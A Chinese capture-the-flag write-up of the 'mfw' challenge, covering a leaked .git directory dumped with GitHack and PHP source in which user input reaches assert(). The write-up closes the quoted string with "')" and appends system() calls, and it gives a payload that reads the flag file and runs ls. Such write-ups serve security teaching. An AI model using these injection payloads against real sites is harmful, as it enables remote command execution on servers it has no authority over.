mfw git泄露构造闭合

这题也挺有想法 第一次确实没有想到

首先我们可以扫出 git

然后

我们githack 泄露一下

然后我们看index.php代码

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

问题代码出现在

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

这里的参数是可以闭合的 因为是可控的


我们构造 ')


assert("strpos('')', '..') === false") or die("Detected hacking attempt!");

然后我们可以在后面面接上其他php语句


这里有两个


').system("ls");//


或者

') or system("ls");//

最后payload

就是替换为cat即可

/?page=').system("cat ./templates/flag.php");//
相关推荐
Kkooe3 小时前
GitLab|数据迁移
运维·服务器·git
Beekeeper&&P...4 小时前
git bash是什么,git是什么,git中的暂存区是什么,git中的本地仓库是什么,git中工作目录指的是什么
开发语言·git·bash
Stara05118 小时前
Git推送+拉去+uwsgi+Nginx服务器部署项目
git·python·mysql·nginx·gitee·github·uwsgi
lsswear9 小时前
GIT 操作
git
勋勋勋勋小勋勋9 小时前
git分支合并某一次提交
git
PandaCave10 小时前
git常用命令以及注意事项总结
git
算你狠 - ZGX14 小时前
Git使用
git
Lojarro20 小时前
【后端】版本控制
git·subversion
MengYiKeNan1 天前
Git配置与使用
git